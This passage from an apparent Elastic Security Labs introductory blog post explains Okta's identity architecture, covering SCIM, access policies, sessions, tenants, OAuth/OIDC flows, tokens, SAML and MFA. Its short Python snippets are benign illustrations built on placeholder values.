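<p>A minimal SCIM 2.0 user resource, of the kind exchanged during provisioning, looks like the following; the schema URN comes from RFC 7643 and the attribute values are illustrative:</p>

```python
import json

# Minimal SCIM 2.0 user resource (RFC 7643 core schema) of the kind exchanged
# between Okta and a downstream app during provisioning; values are illustrative.
scim_user = {
    "schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"],
    "userName": "ada.lovelace@example.com",
    "name": {"givenName": "Ada", "familyName": "Lovelace"},
    "emails": [{"value": "ada.lovelace@example.com", "primary": True}],
    "active": True,
}
body = json.dumps(scim_user)  # sent as the request body when provisioning downstream
```

<p>Because every SCIM-compliant application expects this same shape, Okta can provision and deprovision users across many platforms without per-app translation logic.</p>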
<p>More information on SCIM can be found in <a href="https://datatracker.ietf.org/doc/html/rfc7644">RFC 7644</a> or by <a href="https://developer.okta.com/docs/concepts/scim/#how-does-scim-work">Okta</a>.</p>
<h2>Access policies</h2>
<p>Okta's <a href="https://developer.okta.com/docs/concepts/policies/">access policies</a> play a critical role in managing access to applications and APIs. They can be customized based on user/group membership, device, location, or time, and can enforce extra authentication steps for sensitive applications. These policies, stored as JSON in Okta, allow for:</p>
<ul>
<li>Creating complex authorization rules.</li>
<li>Specifying additional authentication levels for Okta applications.</li>
<li>Managing user access and modifying access token scopes with inline hooks.</li>
</ul>
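<p>As a rough picture of what such a stored policy rule looks like, here is a simplified sketch loosely modeled on the JSON shapes in Okta's Policy API; the field names and values are illustrative rather than an exact schema:</p>

```python
import json

# Simplified sign-on policy rule, loosely modeled on the JSON shapes in
# Okta's Policy API; field names and values here are illustrative.
rule = {
    "name": "Require MFA off-network",
    "conditions": {
        "network": {"connection": "ZONE", "include": ["untrusted-zone-id"]},
    },
    "actions": {
        "signon": {"access": "ALLOW", "requireFactor": True},
    },
}
serialized = json.dumps(rule)
```

<p>The condition/action split is the part to internalize: conditions describe the request context, and actions describe what authentication the policy then demands.</p>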
<p>Key Policy Types in Okta include:</p>
<ul>
<li><em>Sign-On Policies</em>: Control app access with IF/THEN rules based on context, like IP address.</li>
<li><em>Global Session Policy</em>: Manages access to Okta, including factor challenges and session duration.</li>
<li><em>Authentication Policy</em>: Sets extra authentication requirements for each application.</li>
<li><em>Password Policy</em>: Defines password requirements and recovery operations.</li>
<li><em>Authenticator Enrollment Policy</em>: Governs multifactor authentication method enrollment.</li>
</ul>
<p>Policy effectiveness hinges on their sequential evaluation, applying configurations when specified conditions are met. The evaluation varies between the AuthN and Identity Engine pipelines, with the latter considering both global session and specific authentication policies.</p>
<p>Additionally, <a href="https://help.okta.com/en-us/content/topics/security/network/network-zones.htm">Network Zones</a> in Okta enhance access control by managing it based on user connection sources. These zones, configurable by IP address and geolocation, integrate with access policies to enforce varied authentication requirements based on network origin. This integration bolsters security and aids in monitoring and threat assessment.</p>
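<p>Conceptually, the IP-based part of a zone evaluation reduces to a membership check over CIDR ranges, as in this toy sketch (the ranges are RFC 5737 documentation examples, not real zone configuration):</p>

```python
import ipaddress

# Toy evaluation of a network-zone condition: is the client IP inside any of
# the zone's CIDR ranges? The ranges below are documentation examples (RFC 5737).
ZONE_CIDRS = ["203.0.113.0/24", "198.51.100.0/24"]

def in_zone(client_ip):
    ip = ipaddress.ip_address(client_ip)
    return any(ip in ipaddress.ip_network(cidr) for cidr in ZONE_CIDRS)
```

<p>An access policy can then branch on the result, for example requiring an additional factor when <code>in_zone</code> is false.</p>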
<h1>Session management</h1>
<p>In web-based interactions involving Identity Providers (IdPs) like Okta and Service Providers (SPs), the concept of a session is central to the user experience and security framework. A session is typically initiated when an end-user starts an interaction with an IdP or SP via a web browser, whether this interaction is intentional or inadvertent.</p>
<p>Technically, a session represents a state of interaction between the user and the web service. Unlike a single request-response communication, a session persists over time, maintaining the user's state and context across multiple interactions. This persistence is crucial, as it allows the user to interact with web services without needing to authenticate for each action or request after the initial login.</p>
<p>A session can hold a variety of important data, which is essential for maintaining the state and context of the user's interactions. This includes, but is not limited to:</p>
<p><em>Cookies</em>: These are used to store session identifiers and other user-specific information, allowing the web service to recognize the user across different requests.</p>
<p><em>Tokens</em>: Including access, refresh, and ID tokens, these are critical for authenticating and authorizing the user, and for maintaining the security of their interactions with the web service.</p>
<p><em>User Preferences and Settings</em>: Customizations or preferences set by the user during their interaction.</p>
<p><em>Session Expiration Data</em>: Information about when the session will expire or needs to be refreshed. This is vital for security, ensuring that sessions don’t remain active indefinitely, which could pose a security risk.</p>
<p>The management of sessions, particularly their creation, maintenance, and timely expiration, is a crucial aspect of web-based services. Effective session management ensures a balance between user convenience — by reducing the need for repeated logins — and security — by minimizing the risk of unauthorized access through abandoned or excessively long-lived sessions. In the interactions between the end-user, IdP, and SP, sessions facilitate a seamless yet secure flow of requests and responses, underpinning the overall security and usability of the service.</p>
<h3>Session initialization and authentication:</h3>
<p>Okta manages <a href="https://developer.okta.com/docs/concepts/session/">user sessions</a> beginning with the IdP session, which is established when a user successfully authenticates using their credentials, and potentially multi-factor authentication (MFA). This IdP session is key to accessing various applications integrated into an organization's Okta environment. For instance, an HTTP POST request to Okta's <code>/api/v1/authn</code> endpoint initiates this session by validating the user's credentials. In addition, the <a href="https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/">Sessions endpoint API</a> can help facilitate creation and management at <code>/api/v1/sessions</code>.</p>
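<p>The primary-authentication call can be sketched as follows; the request is built but never sent, and the domain and credentials are placeholder values:</p>

```python
import json
import urllib.request

# Primary-authentication request against /api/v1/authn, built but not sent;
# the domain and credentials are placeholders.
body = json.dumps({"username": "ada@example.com", "password": "correct-horse"}).encode()
req = urllib.request.Request(
    "https://example.okta.com/api/v1/authn",
    data=body,
    method="POST",
    headers={"Content-Type": "application/json", "Accept": "application/json"},
)
# A successful response includes a one-time session token that the browser then
# exchanges (for example, via an OIDC redirect) for a session cookie.
```

<p>The exchange of that one-time token for a cookie is exactly the redirection step described in the flow below.</p>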
<p>Okta primarily uses cookies for session management, specifically in the context of identity provider (IdP) sessions. These cookies are crucial for maintaining the session state and user context across HTTP requests within the Okta environment. A typical session cookie retrieval for the end-user’s browser goes as follows:</p>
<ol>
<li>IdP or SP-initiated application access request</li>
<li>Authentication request either via OIDC or SAML</li>
<li>After successful credential validation, a session token is returned</li>
<li>Redirection to OIDC endpoint, session redirection, or application embed link for session cookie</li>
</ol>
<p>As detailed, when a user successfully authenticates, Okta ultimately sets a session cookie in the user’s browser. This cookie is then used to track the user session, allowing for seamless interaction with various applications without the need for re-authentication.</p>
<h3>Tokens vs cookies:</h3>
<p>While Okta utilizes tokens like ID and access tokens for API access and authorization, these tokens serve a different purpose from session cookies. Tokens are typically used in API interactions and are not responsible for maintaining the user’s session state. In contrast, session cookies are specifically designed for maintaining session continuity within the web browser, making them essential for web-based SSO and session management within Okta.</p>
<p>Session tokens are similar to client-side secrets, just like authorization codes during authorization requests. These secrets, along with the correct requests to specific API endpoints can allow an end-user, or adversary, to obtain a session cookie or access token which can then be used to make authenticated/authorized requests on behalf of the user. This should warrant increased security measures for session management and monitoring.</p>
<h3>Single sign-on (SSO):</h3>
<p><a href="https://www.okta.com/blog/2021/02/single-sign-on-sso/">SSO</a> is a critical feature in Okta's session management, allowing users to access multiple applications with a single set of credentials. This is achieved through protocols like SAML and OIDC, where an HTTP(S) request to the SAML endpoint, for instance, facilitates user authentication and grants access across different applications without the need for repeated logins.</p>
<p>In SSO scenarios, Okta’s session cookies play a vital role. Once a user is authenticated and a session is established, the same session cookie, bundled with every service provider request, facilitates access to multiple applications within the SSO framework. This eliminates the need for the user to log in separately to each application, streamlining the user experience.</p>
<h3>Session termination:</h3>
<p>Terminating a session in Okta can occur due to expiration. This can also occur from a user, SP, or IdP-initiated sign-out. An HTTP DELETE request to Okta's <code>/api/v1/sessions/me</code> endpoint terminates the current user’s session. In the case of SSO, this termination can trigger a single logout (SLO), ending sessions across all accessed applications.</p>
<h3>Application sessions and additional controls:</h3>
<p>Application sessions are specific to the application a user accesses post-authentication with the IdP. Okta allows fine-grained control over these sessions, including different expiration policies for privileged versus non-privileged applications. Additionally, administrators can implement policies for single logout (<a href="https://support.okta.com/help/s/article/What-SLO-does-and-doesnt-do?language=en_US">SLO</a>) or local logout to further manage session lifecycles.</p>
<p>Understanding the mechanics of session initiation, management, and termination, as well as the role of tokens and cookies, is foundational for exploring deeper security topics. This knowledge is crucial when delving into areas like attack analysis and session hijacking, which will be discussed in later parts of this blog series.</p>
<p>More information on sessions can be found in <a href="https://developer.okta.com/docs/concepts/session/#application-session">Session management with Okta</a> or <a href="https://developer.okta.com/docs/api/openapi/okta-management/management/tag/Session/">Sessions for Developers</a>.</p>
<h1>Tenants</h1>
<p>In the SaaS realm, a <a href="https://developer.okta.com/docs/concepts/multi-tenancy/">tenant</a> is a distinct instance of software and infrastructure serving a specific user group. In Okta's <a href="https://developer.okta.com/docs/concepts/multi-tenancy/">multi-tenant</a> platform, this concept is key for configuring access control. Tenants can represent various groups, from internal employees to external contractors, each requiring unique access to applications. This is managed through Okta, serving as the IdP.</p>
<p>Tenants are versatile within Okta: they can be tailored based on security policies, user groups, roles, and profiles, allowing them to operate independently within the organization. This independence is crucial in multi-tenant environments, where distinct tenants are segregated based on factors like roles, data privacy, and regulatory requirements. Such setups are common in Okta, enabling users to manage diverse access needs efficiently.</p>
<p>In multi-org environments, Okta facilitates tenants across separate organizations through its UD. The configuration of each tenant is influenced by various factors including cost, performance, and data residency, with user types and profiles forming the basis of tenant setup. Additionally, features like delegated admin support and DNS customization for post-sign-in redirects are instrumental in managing tenant access.</p>
<p>Understanding the nuances of tenant configuration in Okta is vital, not only for effective administration but also for comprehending potential security challenges, such as the risk of <a href="https://github.com/pushsecurity/saas-attacks/blob/main/techniques/poisoned_tenants/description.md">poisoned tenants</a>.</p>
<h1>Authorization workflow</h1>
<p>As we discussed earlier, Okta - being an IdP - provides an authorization server as part of its services. It is critical to understand the authorization workflow that happens on the front and back-end channels. For this discussion and examples, we will use the client (end-user), authorization server (Okta), and SP (application server) as the actors involved.</p>
<h2>OAuth 2.0 and OIDC protocols</h2>
<h3>High-level overview of OAuth</h3>
<p>OAuth 2.0, defined in <a href="https://datatracker.ietf.org/doc/html/rfc6749">RFC 6749</a>, is a protocol for authorization. It enables third-party applications to gain limited access approved by the end-user or resource owner. Operating over HTTPS, it grants access tokens to authorize users, devices, APIs, servers, and applications.</p>
<p>Key OAuth terminology:</p>
<p><a href="https://www.oauth.com/oauth2-servers/scope/defining-scopes/">Scopes</a>: Define the permissions granted within an access token. They represent session permissions for each interaction with a resource server.</p>
<p>Consent: A process where end users or clients agree or disagree with the permissions (scopes) requested by a client application. For example, a consent screen in Google Workspace.</p>
<p>Tokens: Includes access tokens for resource access and refresh tokens for obtaining new access tokens without re-authorizing.</p>
<p><a href="https://auth0.com/docs/get-started/applications/confidential-and-public-applications">Grants</a>: Data sent to the authorization server to receive an access token, like an authorization code granted post-authentication.</p>
<p><a href="https://auth0.com/docs/get-started/applications/confidential-and-public-applications">Clients</a>: In OAuth, clients are either 'confidential', able to securely store credentials, or 'public', which cannot.</p>
<p>Authorization Server: Mints OIDC and OAuth tokens and applies access policies, each with a unique URI and signing key.</p>
<p><a href="https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.">Authorization Endpoint</a>: An API endpoint (/oauth/authorize) for user interaction and authorization.</p>
<p><a href="https://cloudentity.com/developers/basics/oauth-grant-types/authorization-code-flow/#:~:text=The%20user%20authenticates%20with%20their,server%20issues%20an%20authorization%20code.">Token Endpoint</a>: An API endpoint (/oauth/token) for clients to obtain access or refresh tokens, typically requiring a grant type like authorization code.</p>
<p>Resource Server (or Service Provider, SP): Provides services to authenticated users, requiring an access token.</p>
<p>Front-end Channel: Communication between the user’s browser and the authorization or resource server.</p>
<p>Back-end Channel: Machine-to-machine communication, such as between resource and authorization servers.</p>
<p>This streamlined overview covers the essentials of OAuth in the Okta ecosystem, focusing on its function, key terms, and components.</p>
<h3>High-level overview of OIDC</h3>
<p>At the beginning of this blog, we also discussed how <a href="https://openid.net/specs/openid-connect-core-1_0.html">OIDC</a> is an identity authentication protocol that sits on top of the OAuth authorization framework. While OAuth provides authorization, it has no mechanism for authentication, which is where the OIDC protocol comes in. The identity of the authenticated user is often called the resource owner.</p>
<p>The OIDC flow looks similar to the OAuth flow; however, during the initial HTTPS request, scope=openid is added so that the authorization server returns not only an access token but an ID token as well.</p>
<p>The ID token is formatted as a JSON Web Token (JWT) so that the client can extract information about the identity. This is unlike the access token, which the client passes to the resource server every time access is required. Data such as expiration, issuer, signature, email, and more can be found inside the JWT - these are also known as claims.</p>
<h2>Authorization code flow</h2>
<h3>Step 1 - Initial authorization request:</h3>
<p>The authorization code flow is initiated when the client sends an HTTP GET request to Okta’s authorization endpoint. This request is crucial in establishing the initial part of the OAuth 2.0 authorization framework.</p>
<p>Here’s a breakdown of the request components:</p>
<ul>
<li>Endpoint: The request is directed to <code>/oauth2/default/v1/authorize</code>, which is Okta’s authorization endpoint</li>
<li>Parameters:
<ul>
<li><code>response_type=code</code>: This parameter specifies that the application is initiating an authorization code grant type flow.</li>
<li><code>client_id</code>: The unique identifier for the client application registered with Okta.</li>
<li><code>redirect_uri</code>: The URL to which Okta will send the authorization code.</li>
<li><code>scope</code>: Defines the level of access the application is requesting.</li>
</ul>
</li>
</ul>
<p>Example Request:</p>
<pre><code>GET /oauth2/default/v1/authorize?response_type=code \ 
&amp;client_id=CLIENT_ID&amp;redirect_uri=REDIRECT_URI&amp;scope=SCOPE
</code></pre>
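<p>The same request can be constructed programmatically. The following is a minimal sketch using Python's standard library; the Okta domain, redirect URI, and parameter values are placeholders, not real registered values:</p>

```python
from urllib.parse import urlencode

# Hypothetical values; a real client registers these with its Okta org.
params = {
    "response_type": "code",        # authorization code grant type
    "client_id": "CLIENT_ID",
    "redirect_uri": "https://app.example.com/callback",
    "scope": "openid profile email",
    "state": "random-state-value",  # CSRF protection, recommended practice
}

auth_url = (
    "https://example.okta.com/oauth2/default/v1/authorize?" + urlencode(params)
)
```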
<h3>Step 2 - User authentication and consent:</h3>
<p>Once the request is made, the user is prompted to authenticate with Okta and give consent for the requested scopes. This step is fundamental for user verification and to ensure that the user is informed about the type of access being granted to the application.</p>
<h3>Step 3 - Authorization code reception:</h3>
<p>Post authentication and consent, Okta responds to the client with an authorization code. This code is short-lived and is exchanged for a longer-lived credential used to make further requests: an access token.</p>
<p>Example token exchange request:</p>
<pre><code>POST /oauth2/default/v1/token
Content-Type: application/x-www-form-urlencoded

grant_type=authorization_code&amp;
code=AUTHORIZATION_CODE&amp;
redirect_uri=REDIRECT_URI&amp;
client_id=CLIENT_ID&amp;
client_secret=CLIENT_SECRET
</code></pre>
<h3>Step 4 - Redirect URIs and client authentication</h3>
<p>Redirect URIs play a pivotal role in the security of the OAuth 2.0 flow. They are pre-registered URLs to which Okta sends the authorization code. The integrity of these URIs is paramount, as they ensure that the response is only sent to the authorized client.</p>
<p>The client application is authenticated at the token endpoint, usually by providing the <code>client_id</code> and <code>client_secret</code>. This step is crucial to verify the identity of the client application and prevent unauthorized access.</p>
<h3>Step 5 - Token exchange</h3>
<p>In the final step, the client makes an HTTP POST request to Okta’s token endpoint, exchanging the authorization code for an access token. This access token is then used to make API requests on behalf of the user.</p>
<p>The inclusion of client credentials (client ID and client secret) in this request is a critical security measure, ensuring that the token is only issued to the legitimate client.</p>
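<p>A minimal sketch of this exchange using only Python's standard library is shown below. The token endpoint URL is a placeholder, and the network call is wrapped in a function rather than executed, since it requires a live authorization code and registered client credentials:</p>

```python
import json
import urllib.request
from urllib.parse import urlencode

def build_token_request_body(code: str, client_id: str, client_secret: str,
                             redirect_uri: str) -> str:
    """Form-encode the authorization-code grant parameters."""
    return urlencode({
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,
        "client_id": client_id,
        "client_secret": client_secret,
    })

def exchange_code_for_token(
    code: str, client_id: str, client_secret: str, redirect_uri: str,
    token_endpoint: str = "https://example.okta.com/oauth2/default/v1/token",
) -> dict:
    """POST the authorization code to the token endpoint; return the parsed JSON."""
    body = build_token_request_body(
        code, client_id, client_secret, redirect_uri
    ).encode()
    req = urllib.request.Request(
        token_endpoint,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())
```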
<h2>Access tokens and scopes</h2>
<p>An <a href="https://www.okta.com/identity-101/access-token/">access token</a> is a compact code carrying extensive data about a user and their permissions. It serves as a digital key, facilitating communication between a server and a user's device. Commonly used in various websites, access tokens enable functionalities like logging in through one website (like Facebook) to access another (like Salesforce).</p>
<h3>Composition of an access token:</h3>
<p>An access token typically comprises three distinct parts, each serving a specific purpose:</p>
<ul>
<li><em>Header</em>: This section contains metadata about the token, including the type of token and the algorithm used for encryption.</li>
<li><em>Payload (claims)</em>: The core of the token, includes user-related information, permissions, group memberships, and expiration details. The payload dictates whether a user can access a specific resource, depending on the permissions granted within it. Developers can embed custom data in the payload, allowing for versatile applications, such as a single token granting access to multiple APIs.</li>
<li><em>Signature</em>: A hashed verification segment that confirms the token's authenticity. This makes the token secure and challenging to tamper with or replicate.</li>
</ul>
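<p>For JWT-formatted tokens, these three parts are dot-separated base64url segments. The sketch below decodes the header and claims for inspection only; it deliberately does not verify the signature, so it must never be used for trust decisions:</p>

```python
import base64
import json

def decode_jwt_unverified(token: str):
    """Split a JWT into its (header, claims) dicts WITHOUT verifying the signature."""
    def b64url_decode(segment: str) -> bytes:
        # JWT segments drop base64 padding; restore it before decoding
        return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

    header_seg, payload_seg, _signature_seg = token.split(".")
    return (
        json.loads(b64url_decode(header_seg)),
        json.loads(b64url_decode(payload_seg)),
    )
```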
<p>A common format for access tokens is the JWT, as we previously discussed, which is concise yet securely encodes all necessary information.</p>
<h3>Scopes and permissions:</h3>
<p><a href="https://developer.okta.com/docs/api/oauth2/">Scopes</a> in OAuth 2.0 are parameters that define the level and type of access the client requests. Each scope translates into specific permissions granted to the access token. For instance, a scope of email would grant the client application access to the user's email address. The granularity of scopes allows for precise control over what the client can and cannot do with the access token, adhering to the principle of least privilege.</p>
<h3>Token lifespan and refresh tokens:</h3>
<p>Access tokens are inherently short-lived for security reasons, reducing the window of opportunity for token misuse in case of unintended disclosure. Okta allows customization of <a href="https://support.okta.com/help/s/article/What-is-the-lifetime-of-the-JWT-tokens?language=en_US#:~:text=ID%20Token%3A%2060%20minutes,Refresh%20Token%3A%2090%20days">token lifespans</a> to suit different security postures. Once an access token expires, it can no longer be used to access resources.</p>
<p><a href="https://developer.okta.com/docs/guides/refresh-tokens/main/">Refresh tokens</a>, where employed, serve to extend the session without requiring the user to authenticate again. A refresh token can be exchanged for a new access token, thus maintaining the user's access continuity to the application. The use of refresh tokens is pivotal in applications where the user remains logged in for extended periods.</p>
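<p>Because a JWT's exp claim records expiry as a Unix timestamp, a client can decide locally when to spend its refresh token. A minimal sketch; the 60-second leeway is an arbitrary allowance for clock skew, not an Okta-defined value:</p>

```python
import time

def should_refresh(claims: dict, now=None, leeway: int = 60) -> bool:
    """True when the token's exp claim is within `leeway` seconds of expiring.

    Tokens with no exp claim are treated as already expired.
    """
    now = time.time() if now is None else now
    return claims.get("exp", 0) - leeway <= now
```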
<h3>Token storage:</h3>
<p>Regarding <a href="https://auth0.com/docs/secure/security-guidance/data-security/token-storage">token storage</a>, for browser-based applications, such as those utilizing services like Okta, secure storage of access tokens is a critical aspect of user session management. These tokens are typically stored using one of several methods: browser in-memory storage, session cookies, or browser local/session storage. In-memory storage, preferred for its strong defense against XSS attacks, holds the token within the JavaScript memory space of the application, although it loses the token upon page refresh or closure. Session cookies offer enhanced security by being inaccessible to JavaScript, thereby reducing XSS vulnerabilities, but require careful implementation to avoid CSRF attacks. Local and session storage options, while convenient, are generally less recommended for sensitive data like access tokens due to their susceptibility to XSS attacks. The choice of storage method depends on the type of application: a traditional web page, a mobile app, or a single-page app.</p>
<h3>Security and expiration:</h3>
<p>The security of access tokens is of paramount importance in safeguarding user authentication and authorization processes, especially during their transmission over the internet. Encrypting these tokens is crucial, as it ensures that their contents remain confidential and impervious to unauthorized access. Equally important is the use of secure communication channels, notably HTTPS, to prevent the interception and compromise of tokens in transit. Furthermore, the signature component of a token, particularly in JWTs, plays a vital role in verifying its authenticity and integrity. This signature confirms that the token has not been altered and is genuinely issued by a trusted authority, thus preventing the risks associated with token forgery and replay attacks.</p>
<p>Access tokens are inherently designed with expiration mechanisms, a strategic choice to mitigate the risks associated with token theft or misuse. This finite lifespan of tokens necessitates regular renewal, typically managed through refresh tokens, thereby ensuring active session management and reducing opportunities for unauthorized use. The storage and handling of these tokens in client applications also significantly impact their overall security. Secure storage methods, such as in-memory or encrypted cookies, alongside careful management of token renewal processes, are essential to prevent unauthorized access and maintain the robustness of user sessions and access controls.</p>
<h1>Authentication workflow</h1>
<h2>Authentication vs authorization</h2>
<p>Before we dive into authentication in Okta, we should take a moment to understand the difference between authentication and authorization. To put it simply, authentication is providing evidence to prove identity, whereas authorization is about permissions and privileges once access is granted.</p>
<p>As we discussed throughout this blog, the Identity Engine and UD are critical to identity management in Okta. As a recap, the Identity Engine is used for enrolling, authenticating, and authorizing users. The UD is the main directory service in Okta, containing users, groups, profiles, and policies, and serving as the source of truth for user data. The UD can be synchronized with other directory services such as AD or LDAP through the Okta endpoint agent.</p>
<p>Identity management can be handled via Okta or through an external IdP, such as Google Workspace. Essentially, when access to an application is requested, the user is redirected to the authorization server’s API endpoints, where authentication provides proof of identity.</p>
<p>Below are the main authentication protocols between the end user, resource server, and authorization server:</p>
<ul>
<li>OIDC: Authentication protocol that sits on top of the OAuth authorization framework. Workflow requires an ID token (JWT) to be obtained during an access token request.</li>
<li>SAML: Open standard protocol formatted in XML that facilitates user identity data exchange between SPs and IdPs.</li>
</ul>
<p>Within Okta, there is plenty of flexibility and customization regarding authentication. Basic authentication is supported where simple username and password schemes are used over HTTP with additional parameters and configurations.</p>
<h2>SAML in authentication</h2>
<p>As previously stated, <a href="https://developer.okta.com/docs/concepts/saml/">SAML</a> is a login standard that helps facilitate user access to applications based on HTTP(s) requests and sessions asynchronously. Over time the use of basic credentials for each application quickly became a challenge and thus federated identity was introduced to allow identity authentication across different SPs, facilitated by the identity providers.</p>
<p>SAML is primarily a web-based authentication mechanism as it relies on a flow of traffic between the end user, IdP, and SP. The SAML authentication flow can either be IdP or SP initiated depending on where the end user visits first for application access.</p>
<p>The SAML request is typically generated by the SP whereas the SAML response is generated by the IdP. The response contains the SAML assertion, which contains information about the authenticated user’s identity and a signed signature by the IdP.</p>
<p>It is important to note that during the SAML workflow, the IdP and SP typically never communicate directly, but instead rely on the end user’s browser for redirections. Typically, the SP trusts the IdP, and thus the identity data forwarded through the user’s web browser to the SP is trusted and access is granted to the application requested.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/starter-guide-to-understanding-okta/image1.png" alt="Diagram depicting Okta SAML authentication process" /></p>
<p>In step 5 from the diagram above, the SAML assertion would be sent as part of this response after the user has authenticated with the IdP. Remember that the assertion is in XML format and can be quite extensive as it contains identity information for the SP to parse and rely on for the end user’s identity verification. Generic examples of SAML assertions are <a href="https://www.samltool.com/generic_sso_res.php">provided</a> by OneLogin. Auth0 also <a href="https://samltool.io/">provides</a> a decoder and parser for these examples as well which is shown in the image below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/starter-guide-to-understanding-okta/image2.png" alt="Auth0 decoder and parser for SAML" /></p>
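<p>As a concrete illustration, a SAML response like the examples above arrives base64-encoded; decoding it and parsing the XML yields the asserted identity. This is a minimal sketch using Python's standard library, assuming a SAML 2.0 response; real code must also validate the IdP's signature before trusting the assertion:</p>

```python
import base64
import xml.etree.ElementTree as ET

SAML_NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}

def subject_from_response(encoded_response: str) -> str:
    """Decode a base64 SAML response and pull the asserted NameID (subject)."""
    document = base64.b64decode(encoded_response).decode()
    root = ET.fromstring(document)
    name_id = root.find(".//saml:Subject/saml:NameID", SAML_NS)
    return name_id.text if name_id is not None else ""
```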
<h2>IdP vs SP responsibilities</h2>
<p>When discussing the roles and responsibilities of the SP and IdP, keep in mind that the SP is meant to provide access to applications for the end user, whereas the IdP provides authentication and authorization. The SP and IdP are typically set up to trust each other with their designated responsibilities. Depending on where the end user begins, workflows for authentication and authorization can be SP or IdP initiated, typically relying on RESTful API endpoints. For authentication, requests and responses travel between the IdP and SP but are often proxied through the end user’s browser.</p>
<p>Although Okta is mainly an IdP and provides authentication and authorization services, it can also be used as an SP. Previously we discussed how Okta’s integration network allows for various 3rd-party applications to be connected and accessible to users through their dashboard. We also explained how authentication workflows can be SP initiated, meaning users could visit their Okta dashboard to request access to an application. At the same time, a 3rd-party IdP could be established such as Google Workspace or Azure AD which would handle the authentication and authorization of the user. If the user were to request access with this type of setup, Okta would then redirect the user to Azure AD for authentication.</p>
<h2>Single-factor vs multi-factor authentication</h2>
<p>Single-factor authentication (SFA) is the simplest form of authentication, requiring a user to supply one credential object for authentication. Commonly, users are familiar with password-based authentication methods where a username and password are supplied to validate themselves. This of course has security implications if the credentials used are stolen, as they can be used by an adversary to log in and access the same resources.</p>
<p>Multifactor authentication (MFA) is similar to SFA, except it requires two or more types of credentials or evidence to be supplied for authentication, typically in sequence. For example, a password-based credential may be supplied and, once verified by the IdP, a one-time password (OTP) may then be requested, supplied via a mobile authenticator application, SMS message, email, or another channel. The common types of authentication factors are something the user knows, possesses, or is (inherence). MFA also increases complexity for adversaries through randomized OTP generation and MFA token expirations.</p>
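<p>The OTPs produced by authenticator apps typically follow the HOTP and TOTP standards (RFC 4226 and RFC 6238): an HMAC-SHA1 over a moving counter, dynamically truncated to a short decimal code. A minimal sketch of that mechanism in general, not of Okta's specific implementation:</p>

```python
import base64
import hmac
import struct
import time

def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over a counter, dynamically truncated."""
    key = base64.b32decode(secret_b32, casefold=True)
    msg = struct.pack(">Q", counter)  # 8-byte big-endian counter
    digest = hmac.new(key, msg, "sha1").digest()
    offset = digest[-1] & 0x0F        # dynamic truncation offset
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret_b32: str, period: int = 30) -> str:
    """RFC 6238 TOTP: HOTP keyed to the current 30-second time step."""
    return hotp(secret_b32, int(time.time()) // period)
```

This is why OTPs expire: each 30-second window yields a different counter, and thus a different code.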
<p>Okta enables other types of authentication methods such as passwordless, risk-based, biometric, transaction, and others. A full list of authentication methods and descriptions can be found <a href="https://developer.okta.com/docs/concepts/iam-overview-authentication-factors/#authentication-methods">here</a>.</p>
<p>Every application or integration added to the Okta organization has an <a href="https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/about-app-sign-on-policies.htm">authentication policy</a>, which verifies conditions for users who attempt to access each application. Authentication policies can also help enforce factor requirements based on these conditions, where the UD and user profile are used to analyze information about the user. Authentication policies can be set globally for applications and users or can be more granular if set at the application level where specific user conditions are met. Authentication policies can be updated, cloned, preset, and merged when duplicate policies exist. Rules that define these granular conditions can be applied to these authentication policies with the Okta Expression Language (<a href="https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/el-about.htm">EL</a>).</p>
<h2>Client-side and server-side communications</h2>
<p>Understanding the distinction between front-end (user-browser interactions) and back-end (server-to-server communications) is crucial in web-based authentication systems. Front-end interactions typically involve user interfaces and actions, while back-end channels handle the sensitive exchanges, like SAML assertions or OAuth tokens, that underpin secure authentication.</p>
<p>In Okta's framework, the interplay between browser and server is key for security and user experience. When a user logs in via Okta, the browser first authenticates with Okta, which then sends back the necessary tokens. These are forwarded to the application server which validates them with Okta, ensuring a secure, behind-the-scenes token exchange.</p>
<p>Okta’s token management is marked by stringent security. Issued tokens like ID and access tokens are securely exchanged among the user’s browser, Okta, and application servers. Protocols like HTTPS and OAuth 2.0 safeguard these transmissions. Features like token rotation and automatic revocation further bolster security, preventing unauthorized access.</p>
<p>Integrating Okta into an application reshapes its design and security. This offloads significant security responsibilities, allowing developers to focus on core functions. Such integration leads to a modular architecture, where authentication services are separate from application logic.</p>
<h1>Conclusion</h1>
<p>We’ve unraveled the complexities of Okta’s architecture and services, providing insights into its role as a leader in modern authentication and authorization. With the platform’s utilization of protocols like OAuth, OIDC, and SAML, Okta stands at the forefront of scalable, integrated solutions, seamlessly working with platforms such as Azure AD and Google Workspace.</p>
<p>Okta's SaaS design, featuring a RESTful API, makes it a versatile Identity Provider (IdP) and Service Provider (SP). Yet, its popularity also brings potential security vulnerabilities. For cybersecurity professionals, it’s crucial to grasp Okta’s complexities to stay ahead of evolving threats. This introduction sets the stage for upcoming deeper analyses of Okta's attack surface, the setup of a threat detection lab, and the exploration of common attacks.</p>
<p>Armed with this knowledge, you’re now better equipped to analyze, understand, and mitigate the evolving cybersecurity challenges associated with Okta’s ecosystem.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/starter-guide-to-understanding-okta/photo-edited-09.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Google Cloud for Cyber Data Analytics]]></title>
            <link>https://www.elastic.co/es/security-labs/google-cloud-for-cyber-data-analytics</link>
            <guid>google-cloud-for-cyber-data-analytics</guid>
            <pubDate>Thu, 14 Dec 2023 00:00:00 GMT</pubDate>
